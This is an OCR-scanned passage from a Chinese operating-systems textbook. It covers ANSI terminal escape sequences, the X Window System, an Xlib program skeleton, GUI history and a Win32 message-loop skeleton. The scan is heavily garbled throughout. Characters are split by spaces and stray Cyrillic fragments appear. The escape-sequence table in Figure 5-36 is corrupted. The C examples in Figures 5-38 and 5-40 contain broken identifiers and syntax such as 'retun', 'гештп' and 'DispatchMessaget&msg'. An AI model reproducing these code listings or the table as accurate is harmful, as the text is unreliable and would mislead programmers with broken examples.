式 ， 该 编辑 器 就 可 以 工作 在 任何 具有 termcap 数 据 库 人 口 的 终端 上 。 许 多 UNIX 软 件 仍然 以 这 种 方式 工作 ， 
即使 在 个 人 计算 机 上 。 

逐渐 地 ， 业 界 看 到 了 转 义 序列 标准 化 的 需要 ， 所 以 就 开发 了 一 个 ANSI 标 准 。 图 5-36 所 示 为 一 些 该 
标准 的 取 值 。 

下 面 考虑 文本 编辑 器 怎样 使 用 这 些 转 义 序列 。 假 设 用 户 键 和 人 了 一 条 命令 指示 编辑 器 完全 删除 第 3 行 ， 
然后 封闭 第 2 行 和 第 4 行 之 间 的 间隙 。 编 辑 器 可 以 通过 串 行 线 向 终端 发 送 如 下 的 转 义 序列 : 

ESC [3:1 H ESC [0 K ESC [1 M 


(其 中 在 上 面 使 用 的 空格 只 是 为 了 分 开 符号 ， 它 们 并 不 传送 )。 这 一 序列 将 光标 移动 到 第 3 行 的 开头 ， 擦 
除 整个 一 行 ， 然 后 删除 现在 的 空 行 ， 使 从 第 4 行 开 始 的 所 有 行 向 上 移动 一 行 。 现 在 ， 第 4 行 变 成 了 第 3 行 ， 
第 5 行 变 成 了 第 4 行 ， 以 此 类 推 。 类 似 的 转 义 序列 可 以 用 来 在 显示 器 的 中 间 添 加 文本 。 字 和 字符 可 以 以 类 
似 的 方式 添加 或 删除 。 


转 义 序列 ах 
ESC [nA 向 上 移动 n 行 
ESC [nB 向 下 移动 m 行 
ESC [nC 向 右 移动 "个 间隔 кла ш 
| ESC [nD [лты | 
ESC [m;nH | 将 光标 移动 到 (m,n) Si 
ESC [sy 从 光标 清除 屏 碍 《0 到 结尾 、! 从 开始 ，2 两 者 ) 
| Е5С[5К 从 光标 清除 行 0 到 结尾 、1 从 开始 ，2 两 者 ) 
ESCIAL 在 光标 处 插入 n 行 с | 
ESC [nM 在 光标 处 副 除 " 行 
ESCInP _ 在 光标 处 删除 "个 字符 Esg 
ESC [ne 在 光标 处 插入 n 个 字符 ы 
ESC [пт 允许 再 现 ”(0= 常 规 、4= 粗 体 、5= 闪 烁 、7= 反 白 ) 
ESCM 如 果 光 标 在 顶 行 上 则 向 后 滚动 屏幕 


图 5-36 终端 驱动 程序 在 输出 时 接受 的 ANSI 转 义 序列 。ESC 表 示 ASCII 转 义 字符 
(0x1B)，n、m 和 s 是 可 选 的 数值 参数 


2.X 窗 口 系统 

几乎 所 有 UNIX 系 统 的 用 户 界面 都 以 X 窗 口 系统 (X Window System) 为 基础 ，X 窗 口 系统 经 常 仅 称 
为 X， 它 是 作为 Athena 计 划 9 的 一 部 分 于 20 世 纪 80 年 代 在 MIT 开 发 的 。 XX 窗口 系统 具有 非常 好 的 可 移植 性 ， 
并 且 完 全 运行 在 用 户 空间 中 。 人 们 最 初 打算 将 其 用 于 将 大 量 的 远程 用 户 终端 与 中 央 计 算 服务 器 相连 接 ， 
所 以 它 在 逻辑 上 分 成 客户 软件 和 主机 软件 ， 这 样 就 有 可 能 运行 在 不 同 的 计算 机 上 。 在 现代 个 人 计算 机 上 ， 
两 部 分 可 以 运行 在 相同 的 机 器 上 。 在 Linux 系 统 上 ， 流 行 的 Gnome 和 KDE 桌 面 环 境 就 运行 在 X 之 上 。 

当 X 在 一 台 机 器 上 运行 时 ， 从 键盘 或 鼠标 采集 输入 并 且 将 输出 写 到 屏幕 上 的 软件 称 为 X 服 务 器 (X 
server) 。 它 必须 跟踪 当前 选择 了 哪个 窗口 (鼠标 指针 所 在 处 )， 这 样 它 就 知道 将 新 的 键盘 输入 发 送 给 哪 
个 客户 。 它 与 称 为 X 客 户 (X client) 的 运行 中 的 程序 进行 通信 (可 能 通过 网 络 )。 它 将 键盘 与 鼠标 输入 
发 送 给 X 客 户 ， 并 且 从 X 客 户 接收 显示 命令 。 


Ө Athena (雅典 娜 ) 指 麻 省 理工 学 院 (MIT) 校园 范围 内 基于 UNIX 的 计算 环境 .一 — 译 者 注 
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X 服 务 器 总 是 位 于 用 户 的 计算 机 内 部 ， 而 X 客 户 有 可 能 在 远方 的 远程 计算 服务 器 上 ， 这 看 起 来 也 许 
有 些 不 可 思议 ， 但 是 X 服 务 器 的 主要 工作 是 在 屏幕 上 显示 位 ， 所 以 让 它 靠 近 用 户 是 有 道理 的 。 从 程序 的 
观点 来 看 ， 它 是 一 个 客户 ， 吟 只 服 务 器 做 事情 ， 例 如 显示 文本 和 几何 图 形 。 服 务 器 (在 本 地 PC 中 ) 只 是 
做 客户 吟 只 它 做 的 事情 ， 就 像 所 有 服务 器 所 做 的 那样 。 

对 于 X 客 户 和 X 服 务 器 在 不 同 机 器 上 的 情形 ， 客 户 与 服务 器 的 布置 如 图 5-37 所 示 。 但 是 当 在 单一 的 
机 器 上 运行 Gnome 或 者 KDE 时 ， 客 户 只 是 使 用 X 库 与 相同 机 器 上 的 X 服 务 器 进行 会 话 的 某 些 应 用 程序 
(但 是 通过 套 接 字 使 用 TCP 连 接 ， 与 远程 情形 中 所 做 的 工作 相同 ) 。 


远程 主机 


窗口 管理 器 | 应 用 程序 
[= 
用 户 空间 


X 服 务 器 
UNIX 
硬件 
网 络 


15-37 MIT X 窗 口 系 统 中 的 客户 与 服务 器 


在 单机 上 或 者 通过 网 络 在 UNIX (或 其 他 操作 系统 ) 之 上 运行 X 窗 口 系统 都 是 可 行 的 ， 其 原因 在 于 X 
定义 的 是 X 客 户 与 X 服 务 器 之 间 的 X 协 议 ， 如 图 5-37 所 示 。 客 户 与 服务 器 是 在 同一 台 机 器 上 ， 还 是 
通过 一 个 局 域 网 隔 开 了 100m， 或 者 是 相距 几 千 公里 并 且 通过 Internet 相 连接 都 无 关 紧要 。 在 所 有 这 些 情 
况 下 ， 协 议 与 系统 操作 都 是 完全 相同 的 。 

X 只 是 一 个 窗口 系统 ， 它 不 是 一 个 完全 的 GUI。 为 了 获得 完全 的 GUI， 要 在 其 上 运行 其 他 软件 层 。 
一 层 是 Xlib， 它 是 一 组 库 过 程 ， 用 于 访问 X 的 功能 。 这 些 过 程 形成 了 X 窗 口 系统 的 基础 ， 我 们 将 在 下 面 
对 其 进行 分 析 ， 但 是 这 些 过 程 过 于 原始 了 ， 以 至 于 大 多 数 用 户 程序 不 能 直接 访问 它们 。 例 如 ， 每 次 鼠标 
点 击 是 单独 报告 的 ， 所 以 确定 两 次 点 击 实际 上 形成 了 双击 必须 在 Xlib 之 上 处 理 。 

为 了 使 得 对 X 的 编程 更 加 容易 ， 作 为 X 的 一 部 分 提供 了 一 个 工具 包 , 组 成 了 Intrinsics (本 征 函数 集 ) 。 
这 一 层 管理 按钮 、 滚 动 条 以 及 其 他 称 为 窗口 小 部 件 (widget) 的 GUI 元 素 。 为 了 产生 真正 的 GUI 界面 ， 
共有 一 致 的 外 观 与 感觉 ， 还 需要 另外 一 层 软件 (或 者 几 层 软件 ) 。 一 个 例子 是 Motif， 如 图 5-37 所 示 ， 它 
是 Solaris 和 其 他 商业 UNIX 系 统 上 使 用 的 公共 桌面 环境 (Соттоп Desktop Environment) 的 基础 。 大 多 
数 应 用 程序 利用 的 是 对 Motif 的 调用 ， 而 不 是 对 Xilib 的 调用 。Gnome 和 KDE 具 有 与 图 $-37 相 类 亿 的 结构 ， 
只 是 库 有 所 不 同 。Gnome 使 用 GTK+ 库 ，KDE 使 用 Qt 库 。 拥 有 两 个 GUI 是 否 比 一 个 好 是 有 争议 的 。 

此 外 ， 值 得 注意 的 是 窗口 管理 并 不 是 X 本 身 的 组 成 部 分 。 将 其 遗漏 的 决策 完全 是 故意 的 。 一 个 单独 
的 客户 进程 ， 称 为 窗口 管理 器 (window manager) ， 控 制 着 屏幕 上 窗口 的 创建 、 删 除 以 及 移动 。 为 了 管 
理 窗口 ， 窗 口 管理 器 要 发 送 命令 到 X 服 务 器 告诉 它 做 什么 。 窗 口 管理 器 经 常 运行 在 与 X 客 户 相 同 的 机 器 
E, 但 是 理论 上 它 可 以 运行 在 任何 地 方 。 

这 一 模块 化 设计 ， 包 括 若干 层 和 多 个 程序 ， 使 得 X 高 度 可 移植 和 高 度 灵活 。 它 已 经 被 移植 到 UNIX 的 大 
多 数 版 本 上 ， 包 括 Solaris、BSD 的 所 有 派生 版 本 、AIX、Linux 等 ， 这 就 使 得 对 于 应 用 程序 开发 人 员 来 说 在 
多 种 平台 上 拥有 标准 的 用 户 界面 成 为 可 能 。 它 还 被 移植 到 其 他 操作 系统 上 。 相 反 ， 在 Windows 中 ， 窗 口 与 
GUI 系统 在 GDI 中 混合 在 一 起 并 且 处 于 内 核 之 中 ， 这 使 得 它们 维护 起 来 十 分 困难 ， 并 且 当 然 是 不 可 移植 的 。 

现在 让 我 们 像 是 从 Xlib 层 观察 那样 来 简略 地 看 一 看 X。 当 一 个 X 程 序 启动 时 ， 它 打开 一 个 到 一 个 或 
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多 个 X 服 务 器 (我 们 称 它们 为 工作 站 ) 的 连接 ， 即 使 它们 可 能 与 X 程 序 在 同一 台 机 器 上 。 在 消息 丢失 与 
重复 由 网 络 软件 来 处 理 的 意义 上 ，X 认 为 这 一 连接 是 可 靠 的 ， 并 且 它 不 用 担心 通信 错误。 通常 在 服务 器 
与 客户 之 间 使 用 的 是 TCP/IP。 

四 种 类 型 的 消息 通过 连接 传递 

1) 从 程序 到 工作 站 的 绘图 命令 。 

2) 工作 站 对 程序 请 求 的 应 答 。 

3) 键盘 、 鼠 标 以 及 其 他 事件 的 通告 。 

4) 错误 消息 。 

从 程序 到 工作 站 的 大 多 数 绘图 命令 是 作为 单 向 消息 发 送 的 ， 不 期 望 应 答 。 这 样 设计 的 原因 是 当 客户 与 
服务 器 进程 在 不 同 的 机 器 上 时 ， 命 令 到 达 服 务 器 并 且 执 行 要 花费 相当 长 的 时 间 周 期 。 在 这 一 时 间 内 阻塞 应 用 
程序 将 不 必要 地 降低 其 执行 速度 。 另 一 方面 ， 当 程序 需要 来 自 工作 站 的 信息 时 ， 它 只 好 等 待 直到 应 答 返 回 。 

与 Windows 类 似 ，X 是 高 度 事件 驱动 的 。 事 件 从 工作 站 流向 程序 ， 通 常 是 为 响应 人 的 某 些 行动 ， 例 
如 键盘 敲 击 、 鼠 标 移动 或 者 一 个 窗口 被 显现 。 每 个 事件 消息 32 个 字 节 ， 第 一 个 字 节 给 出 事件 类 型 ， 下 面 
的 31 个 字 节 提供 附加 的 信息 。 存 在 许多 种 类 的 事件 ， 但 是 发 送 给 一 个 程序 的 只 有 那些 它 宣称 愿意 处 理 的 
事件 。 例 如 ， 如 果 一 个 程序 不 想 得 知 键 释放 的 消息 ， 那 么 键 释放 的 任何 事件 都 不 会 发 送 给 它 。 与 在 
Windows 中 一 样 ， 事 件 是 排 成 队列 的 ， 程 序 从 队列 中 读 取 事件 。 然 而 ， 与 Windows 不 同 的 是 ， 操 作 系统 
绝对 不 会 主动 调用 在 应 用 程序 之 内 的 过 程 ， 它 甚至 不 知道 哪个 过 程 处 理 哪个 事件 。 

X 中 的 一 个 关键 概念 是 资源 (resource)。 资 源 是 一 个 保存 一 定 信息 的 数据 结构 。 应 用 程序 在 工作 站 
上 创建 资源 。 在 工作 站 上 ， 资 源 可 以 在 多 个 进程 之 间 共 享 。 资 源 的 存活 期 往往 很 短 ， 并 且 当 工作 站 重新 
启动 后 资源 不 会 继续 存在 。 典 型 的 资源 包括 窗口 、 字 体 、 颜 色 映射 ( 调 色 板 ) 、 像 素 映 射 (位 图 ) 、 光 标 
以 及 图 形 上 下 文 。 图 形 上 下 文 用 于 将 属性 与 窗口 关联 起 来 ， 在 概念 上 与 Windows 的 设备 上 下 文 相 类 似 。 

X 程 序 的 一 个 粗略 的 、 不 完全 的 框架 如 图 5-38 所 示 。 它 以 包含 某 些 必需 的 头 文件 开始 ， 之 后 声明 某 
些 变量 。 然 后 ， 它 与 X 服 务 器 连接 ，X 服 务 器 是 作为 XOpenDisplay 的 参数 设 定 的 。 接 着 ， 它 分 配 一 个 窗 


#include <X11/Xlib.h> 
#include <X11/Xutil.h> 


main(int argo, char *argv[]) 
{ 


Display disp; А БҮ *) 
Window win; > менки / 

ЖӨЕ юп 1 图 形 上 下 文 标识 符 */ 
int running = 1; 启用 于 存储 一 个 事件 */ 


disp = XOpenDisplay("display_ ee 1 连接 到 X 服 务 器 */ 


k 放 为 新 窗口 分 配 内 存 */ 
ї* 向 窗口 管理 器 宣布 窗口 #/ 
, P 创建 图 形 上 下 文 */ 
XSelectinput(disp, win, ButtonPressMask | KeyPressMask | ExposureMask); 
XMapRaised(disp, win); 挛 显 示 窗 口 ， 发 送 Expose 事 件 */ 
while (running) { 
XNextEvent(disp, &емеп); 。 /* 获得 下 一 个 事件 */ 
switch (event.t 
asepo i ынак "ШЕШН 
сазе ButtonPress: break; /* 处 理 鼠 标点 击 */ 
i case Keypress: ; break: /* 处 理 键盘 输入 */ 
} 
XFreeGC(disp, ос): НОКИН ЕТ "/ 
XDestroyWindow(disp, win); е 回收 窗口 的 内 存 空间 */ 
XCloseDisplay(disp); 人 * 拆 印 网 络 连接 */ 


图 5-38 X 窗 口 应 用 程序 的 框架 
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口 资源 并 且 将 指向 该 窗口 资源 的 句柄 存放 在 win 中 。 实 际 上 ， 一 些 初始 化 应 该 出 现在 这 里 ， 在 初始 化 之 
后 X 程 序 通知 窗口 管理 器 新 窗口 的 存在 ， 因 而 窗口 管理 器 能 够 管理 它 。 

对 XCreateGC 的 调用 创建 一 个 图 形 上 下 文 ， 窗 口 的 属性 就 存放 在 图 形 上 下 文中 。 在 一 个 更 加 复杂 的 
程序 中 ， 人 窗口 的 属性 应 该 在 这 里 被 初始 化 。 下 一 条 语句 对 XSelectInput 的 调用 通知 X 服 务 器 程序 准备 处 理 
哪些 事件 ， 在 本 例 中 ， 程 序 对 鼠标 点 击 、 键 盘 敲 击 以 及 窗口 被 显现 感 兴 趣 。 实 际 上 ， 一 个 真正 的 程序 还 
会 对 其 他 事件 感 兴趣 。 最 后 ， 对 XMapRaised 的 调用 将 新 窗口 作为 最 顶层 的 窗口 映射 到 屏幕 上 。 此 时 ， 
窗口 在 屏幕 上 成 为 可 见 的 。 

主 循环 由 两 条 语句 构成 ， 并 且 在 逻辑 上 比 Windows 中 对 应 的 循环 要 简单 得 多 。 此 处 ， 第 一 条 语句 获 
得 一 个 事件 ， 第 二 条 语句 对 事件 类 型 进行 分 派 从 而 进行 处 理 。 当 某 个 事件 表明 程序 已 经 结束 的 时 候 ， 
running 被 设置 为 0%， 循 环 结束 。 在 退出 之 前 ， 程 序 释 放 了 图 形 上 下 文 、 窗 口 和 连接 。 

值得 一 提 的 是 ， 并 非 每 个 人 都 喜欢 GUI。 许多 程序 员 更 喜欢 上 面 5.6.2 节 讨论 的 那 种 传统 的 面向 命令 
行 的 界面 。X 通 过 一 个 称 为 xterm 的 客户 程序 解决 了 这 一 问题 。 该 程序 仿真 了 一 台 古 老 的 VT102 智 能 终端 ， 
完全 具有 所 有 的 转 义 序列 。 因 此 ， 编 辑 器 (例如 vi 和 emacs) 以 及 其 他 使 用 termcap 的 软件 无 需 修改 就 可 
以 在 这 些 窗口 中 工作 。 

3. 图 形 用 户 界 面 

大 多 数 个 人 计算 机 提供 了 GUI (Graphical User Interface， 图 形 用 户 界 面 )。 首 字母 缩写 词 GUI 的 发 
音 是 “gooey”。 

GUI 是 由 斯 坦 福 研究 院 的 Douglas Engelbart 和 他 的 研究 小 组 发 明 的 。 之 后 GUI 被 Xerox PARC 的 研究 
人 员 摹 仿 。 在 一 个 风 和 日 丽 的 日 子 ，Apple 公 司 的 共同 创立 者 Steve Jobs 参 观 了 PARC， 并 且 在 一 台 Xerox 
计算 机 上 见 到 了 GUI。 这 使 他 产生 了 开发 一 种 新 型 计算 机 的 想法 ， 这 种 新 型 计算 机 就 是 Apple Lisa。Lisa 
因为 太 过 昂贵 因而 在 商业 上 是 失败 的 ， 但 是 它 的 后 继 者 Macintosh 获 得 了 巨大 的 成 功 。 

当 Microsoft 得 到 Macintosh 的 原型 从 而 能 够 在 其 上 开发 Microsoft Office 时 ，Microsoft 请 求 Apple 发 放 
界面 许可 给 所 有 新 来 者 ， 这 样 Macintosh 就 能 够 成 为 新 的 业界 标准 。(Microsoft 从 Office 获 得 了 比 MS- 
DOS 多 得 多 的 收入 ， 所 以 它 诛 意 放弃 MS-DOS 以 获得 更 好 的 平台 用 于 Office。) Apple 负 责 Macintosh 的 主 
管 Jean-Louis Gasske 拒 绝 了 Microsoft 的 请 求 ， 并 且 Steve Jobs 已 经 离开 了 Apple 而 不 能 否决 他 。 最 终 ， 
Microsoft 得 到 了 界面 要 素 的 许可 证 ， 这 形成 了 Windows 的 基础 。 当 Microsoft 开 始 迫 上 Apple 时 ，Apple 提 
起 了 对 Microsoft 的 诉讼 ， 声 称 Microsoft 超 出 了 许可 证 的 界限 ， 但 是 法 官 并 不 认可 ， 并 且 Windows 继 续 追 
赶 并 超过 了 Macintosh。 如 果 Gasske 同 意 Apple 内 部 许多 人 的 看 法 (他 们 也 希望 将 Macintosh 软 件 许可 给 任 
何人 )， 那 么 Apple 或 许 会 因为 许可 费 而 变 得 无 限 富有 ， 并 且 现 在 就 不 会 存在 Windows Т. 

GUI 具有 用 字符 WIMP 表 示 的 四 个 基本 要 素 ， 这 些 字母 分 别 代表 窗口 (Window)、 图 标 (Icon), Ж 
单 (Menu) 和 定点 设备 (Pointing device)。 窗口 是 一 个 矩形 块 状 的 屏幕 区 域 ， 用 来 运行 程序 。 图 标 是 
小 符号 ， 可 以 在 其 上 点 击 导致 某 个 动作 发 生 。 菜 单 是 动作 列表 ， 人 们 可 以 从 中 进行 选择 。 最 后 ， 定 点 设 
备 是 鼠标 、 跟 踪 球 或 者 其 他 硬件 设备 ， 用 来 在 屏幕 上 移动 光标 以 便 选择 项 目 。 

GUI 软件 可 以 在 用 户 级 代码 中 实现 (如 UNIX 系 统 所 做 的 那样 ) ， 也 可 以 在 操作 系统 中 实现 (如 
Windows 的 情况 ) 。 

GUI 系统 的 输入 仍然 使 用 键盘 和 鼠标 ， 但 是 输出 几乎 总 是 送 往 特殊 的 硬件 电路 板 ， 称 为 图 形 适配器 
(graphics adapter) 。 图 形 适配器 包含 特殊 的 内 存 ， 称 为 视频 RAM (video RAM) ， 它 保存 出 现在 屏幕 上 的 
图 像 。 高 端的 图 形 适配器 通常 具有 强大 的 32 位 或 64 位 CPU 和 多 达 1GB 自 己 的 RAM， 独立 于 计算 机 的 主 存 。 

每 个 图 形 适 配器 支持 几 种 屏幕 尺寸 。 常 见 的 尺寸 是 1024 x 768、1280 x 960、1600 x 1200 和 1920 x 
1200。 除 了 1920 x 1200 以 外 ， 所 有 这 些 尺寸 的 宽 高 比 都 是 4:3， 符合 NTSC 和 PAL 电 视 机 的 屏幕 宽 高 比 ， 
因此 可 以 在 用 于 电视 机 的 相同 的 监视 器 上 产生 正方 形 的 像素 。 1920 x 1200 尺 寸 意 在 用 于 宽屏 监视 器 ， 它 
的 宽 高 比 与 这 一 分 辩 素 相 匹配 。 在 最 高 的 分 辩 率 下 ， 每 个 像素 具有 24 位 的 彩色 显示 ， 只 是 保存 图 像 就 需 
要 大 约 6.5MB 的 RAM， 所 以 ， 拥 有 256MB 或 更 多 的 RAM， 图 形 适配器 就 能 够 一 次 保存 许多 图 像 。 如 果 
整个 屏幕 每 种 刷新 75 次 ， 那 么 视频 RAM 必 须 能 够 连续 地 以 每 秒 489MB 的 速率 发 送 数据 。 

GUI 的 输出 软件 是 一 个 巨大 的 主题 。 单 是 关于 Windows GUI 就 写 下 了 许多 1500 多 页 的 书 (例如 
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Petzold, 1999, Simon, 1997, Rector 和 Newcomer，1997)。 显 然 ， 在 这 一 小 节 中 ， 我 们 只 可 能 浅 尝 其 
表面 并 且 介 绍 少许 基本 的 概念 。 为 了 使 讨论 具体 化 ， 我 们 将 描述 Win32 API， 它 被 Windows 的 所 有 32 位 
版 本 所 支 特 。 在 一 般 意义 上 ， 其 他 GUI 的 输出 软件 大 体 上 是 相似 的 ， 但 是 细节 过 然 不 同 。 

屏幕 上 的 基本 项 目 是 一 个 矩形 区 域 ， 称 为 宣 口 (window)。 窗 口 的 位 置 和 大 小 通过 给 定 两 个 斜 对 角 
的 坐标 〈 以 像素 为 单位 ) 惟一 地 决定 。 窗 口 可 以 包含 一 个 标题 条 、 一 个 菜单 条 、 一 个 工具 条 、 一 个 垂直 
滚动 条 和 一 个 水 平 滚动 条 。 典 型 的 窗口 如 图 5-39 所 示 。 注 意 ，Windows 的 坐标 系 将 原点 置 于 左上 角 并 且 y 
向 下 增长 ， 这 不 同 于 数学 中 使 用 的 笛 卡 儿 坐 标 。 


(0,0) (1023, 0) 


и 
(200, 100) ~... 


Te bar 
菜单 条 一 > не E Уви т) лода?) нер 
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| 
客户 区 | 
| 一 党 动 条 
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A X 
(0, 767) (1023, 767) 


图 5-39 XGA 显示 器 上 位 于 (200, 100) 处 的 一 个 窗口 样 例 


当 窗 口 被 创建 时 ， 有 一 些 参数 可 以 设 定 窗 口 是 否 可 以 被 用 户 移动 ， 是 否 可 以 被 用 户 调整 大 小 ， 或 者 
是 否 可 以 被 用 户 滚动 (通过 拖 动 滚动 条 上 的 拇指 )。 大 多 数 程序 产生 的 主 窗口 可 以 被 移动 、 调 整 大 小 和 
滚动 ， 这 对 于 Windows 程 序 的 编写 方式 具有 重大 的 意义 。 特 别 地 ， 程 序 必须 被 告知 关于 其 窗口 大 小 的 改 
变 ， 并 且 必 须 准备 在 任何 时 刻 重 画 其 窗口 的 内 容 ， 即 使 在 程序 最 不 期 望 的 时 候 。 

因此 ，Windows 程 序 是 面向 消息 的 。 涉 及 键盘 和 鼠标 的 用 户 操作 被 Windows 所 捕获 ， 并 且 转 换 成 消 
息 ， 送 到 正在 被 访问 的 窗口 所 属于 的 程序 。 每 个 程序 都 有 一 个 消息 队列 ， 与 程序 的 所 有 窗口 相关 的 消息 
都 被 发 送 到 该 队列 中 。 程 序 的 主 循环 包括 提取 下 一 条 消息 ， 并 且 通 过 调用 针对 该 消息 类 型 的 内 部 过 程 对 
其 进行 处 理 。 在 某 些 情况 下 ，Windows 本 身 可 以 绕 过 消息 队列 而 直接 调用 这 些 过 程 。 这 一 模型 与 UNIX 的 
过 程 化 代码 模型 完全 不 同 ，UNIX 模 型 是 提请 系统 调用 与 操作 系统 相互 作用 的 。 然 而 ，X 是 面向 事件 的 。 

为 了 使 这 一 编程 模型 更 加 清晰 ， 请 考虑 图 5-40 的 例子 。 在 这 里 我 们 看 到 的 是 Windows 主 程序 的 框架 ， 
它 并 不 完整 并 且 没有 做 错误 检查 ， 但 是 对 于 我 们 的 意图 而 言 它 显 示 了 足够 的 细节 。 程 序 的 开头 包含 一 个 
头 文件 windows.h， 它 包含 许多 宏 、 数 据 类 型 、 常 数 、 函 数 原型 ， 以 及 Windows 程 序 所 需要 的 其 他 信息 。 

主 程序 以 一 个 声明 开始 ， 该 声明 给 出 了 它 的 名 字 和 参数 。WINAPI 宏 是 一 条 给 编译 器 的 指令 ， 让 编 
译 器 使 用 一 定 的 参数 传递 约定 并 且 不 需要 我 们 进一步 关心 。 第 一 个 参数 h 是 一 个 实例 句柄 ， 用 来 向 系统 
的 其 他 部 分 标识 程序 。 在 某 种 程度 上 ，Win32 是 面向 对 象 的 ， 这 意味 着 系统 包含 对 象 (例如 程序 、 文件 
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和 窗口 )。 对 象 具有 状态 和 相关 的 代码 ， 而 相关 的 代码 称 为 方法 (method) ， 它 对 于 状态 进行 操作 。 对 象 
是 使 用 句柄 来 引用 的 ， 在 该 示例 中 ，h 标 识 的 是 程序 。 第 二 个 参数 只 是 为 了 向 后 兼容 才 出 现 的 ， 它 已 不 
再 使 用 。 第 三 个 参数 szCmd 是 一 个 以 零 终止 的 字符 串 ， 包 含 启动 该 程序 的 命令 行 ， 即 使 程序 不 是 从 命令 
行 启动 的 。 第 四 个 参数 iCmdShow 表 明 程序 的 初始 窗口 应 该 占据 整个 屏幕 ， 占 据 屏幕 的 一 部 分 ， 还 是 一 
点 也 不 占据 屏 医 (只 是 任务 条 )。 


#include <windows.h> 


int WINAPI WinMain(HINSTANCE h, HINSTANCE, hprev, char *szCmd, int iCmdShow) 
{ 


WNDCLASS wndclass; * 本 窗口 的 类 对 象 */ 

MSG msg; 六 进入 的 消息 存放 在 这 里 */ 
HWND hwnd; * 窗口 对 象 的 句柄 (指针 ) */ 
作 初 始 化 wndclass*/ А 
wndclass pfnWndProc = WndProc; 个 指示 调用 哪个 过 程 */ 


wndclass.lpszClassName = "Program пате"; /* 标题 条 的 文本 */ 
wndclass.hicon = Loadicon(NULL, IDI-APPLICATION); /* 装载 程序 图 标 */ 
wndclass.hCursor = LoadCursor(NULL, IDC_ARROW); /* 装载 鼠标 光标 */ 


RegisterClass(&wndclass); 让 向 Windows 注 册 wndclass */ 
hwnd = CreateWindow ( ... ) ї* 为 窗口 分 配 存储 */ 
ShowWindow(hwnd, iCmdShow); /* 在 屏幕 上 显示 窗口 */ 
UpdateWindow(hwnd); 让 指示 窗口 绘制 自身 */ 


while (GetMessage(&msg, NULL, 0, 0)) { /* 从 队列 中 获取 消息 */ 
TranslateMessage(&msg); /* 转换 消息 */ 
DispatchMessaget&msg); /* 将 msg 发 送 给 适当 的 过 程 */ 


} 
retun(msg. wParam); 
} 


long CALLBACK WndProc(HWND hwnd, UINT message, UINT wParam, long IParam) 


/* 这 里 是 声明 */ 

switch (message) { 
case WM_CREATE: ...; гештп..; /* 创建 窗口 */ 
сазе WM_PAINT: ; retum …; /* 重 绘 窗口 的 内 容 */ 
сазе WM_DESTROY: ..; гешт..; /*} 销毁 窗口 */ 


1 
retum(DefWwindowProc(hwnd, message, wParam, ІРагат)); /* 默认 */ 


图 5-40 Windows 主 程序 的 框架 


该 声明 说 明了 一 个 广泛 采用 的 Microsoft 约 定 ， 称 为 多 牙 利 记号 (Hungarian notation), 该 名 称 是 一 
个 涉及 波兰 记号 的 双关 语 ， 波 兰 记号 是 波兰 逻辑 学 家 J. Lukasiewicz 发 明 的 后 组 系统 ， 用 于 不 使 用 优先 级 
和 括号 表示 代数 公式 。 匈 牙 利 记号 是 Microsoft 的 一 名 匈牙利 程序 员 Charles Simonyi 发 明 的 ， 它 使 用 标识 
符 的 前 几 个 字符 来 指定 类 型 。 允 许 的 字母 和 类 型 包括 c (character， 字 符 ) w (word， 字 ， 现 在 意 指 无 
符号 16 位 整数 )、i (integer，32 位 有 符号 整数 )、1 (long, 也 是 一 个 32 位 有 符号 整数 )、s (string， 字 符 
Ж), sz (string terminated by a zero byte， 以 零 字 节 终止 的 字符 串 ) р (pointer， 指 针 ) 、 包 (function, 
函数 ) 和 h (handle， 句 柄 )。 因 此 ， 举 例 来 说 ，szCmd 是 一 个 以 零 终止 的 字符 串 并 且 iCmdShow 是 一 个 束 
数 。 许 多 程序 员 认为 在 变量 名 中 像 这 样 对 类 型 进行 编码 没有 什么 价值 并 且 使 Windows 代 码 异常 地 难于 
阅读 。 在 UNIX 中 就 没有 类 似 这 样 的 约定 。 

每 个 窗口 必须 具有 一 个 相关 联 的 类 对 象 定义 其 属性 ， 在 图 5-40 中 ， 类 对 象 是 wndclass。 对 象 类 型 
WNDCLASS 具 有 10 个 字段 ， 其 中 4 个 字段 在 图 5-40 中 被 初始 化 ， 在 一 个 以 实际 的 程序 中 ， 其 他 6 个 字段 
也 要 被 初始 化 。 最 重要 的 字段 是 lpfnWndProc， 它 是 一 个 指向 函数 的 长 ( 即 32 位 ) 指针 ， 该 函数 处 理 引 
向 该 窗口 的 消息 。 此 处 被 初始 化 的 其 他 字段 指出 在 标题 条 中 使 用 哪个 名 字 和 图 标 ， 以 及 对 于 鼠标 光标 使 
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用 哪个 符号 。 

在 wndclass 被 初始 化 之 后 ，RegisterClass 被 调用 ， 将 其 发 送 给 Windows。 特 别 地 ， 在 该 调用 之 后 
Windows 就 会 知道 当 各 种 事件 发 生 时 要 调用 哪个 过 程 。 下 一 个 调用 CreateWindow 为 窗口 的 数据 结构 分 配 
内 存 并 且 返 回 一 个 句柄 以 便 以 后 引用 它 。 然 后 ， 程 序 做 了 另外 两 个 调用 ， 将 窗口 轮廓 置 于 屏幕 之 上 ， 并 
且 最 终 完全 地 填充 窗口 。 

此 刻 我 们 到 达 了 程序 的 主 循环 ， 它 包括 获取 消息 ， 对 消息 做 一 定 的 转换 ， 然 后 将 其 传 回 Windows 以 
便 让 Windows 调 用 WndProc 来 处 理 它 。 要 回答 这 一 完整 的 机 制 是 否 能 够 得 到 化 简 的 问题 ， 答 案 是 肯定 的 ， 
但 是 这 样 做 是 由 于 历史 的 缘故 ， 并 且 我 们 现在 坚持 这 样 做 。 

主 循环 之 后 是 过 程 WndProc， 它 处 理发 送 给 窗口 的 各 种 消息 。 此 处 CALLBACK 的 使 用 与 上 面 的 
WINAPI 相 类 似 ， 为 参数 指明 要 使 用 的 调用 序列 。 第 一 个 参数 是 要 使 用 的 窗口 的 句柄 。 第 二 个 参数 是 消 
息 类 型 。 第 三 和 第 四 个 参数 可 以 用 来 在 需要 的 时 候 提供 附加 的 信息 。 

消息 类 型 WM_CREATE 和 WM_DESTROY 分 别 在 程序 的 开始 和 结束 时 发 送 。 它 们 给 程序 机 会 为 数 
据 结构 分 配 内 存 ， 并 且 将 其 返回 。 ` 

第 三 个 消息 类 型 WM_PAINT 是 一 条 指令 ， 让 程序 填充 窗口 。 它 不 仅 当 窗口 第 一 次 绘制 时 被 调用 ， 而 
且 在 程序 执行 期 间 也 经 常 被 调用 。 与 基于 文本 的 系统 相反 ， 在 Windows 中 程序 不 能 够 假定 它 在 屏幕 上 画 
的 东西 将 一 直 保持 在 那里 直到 将 其 删除 。 其 他 窗口 可 能 会 被 拖拉 到 该 窗口 的 上 面 ， 菜 单 可 能 会 在 窗口 上 
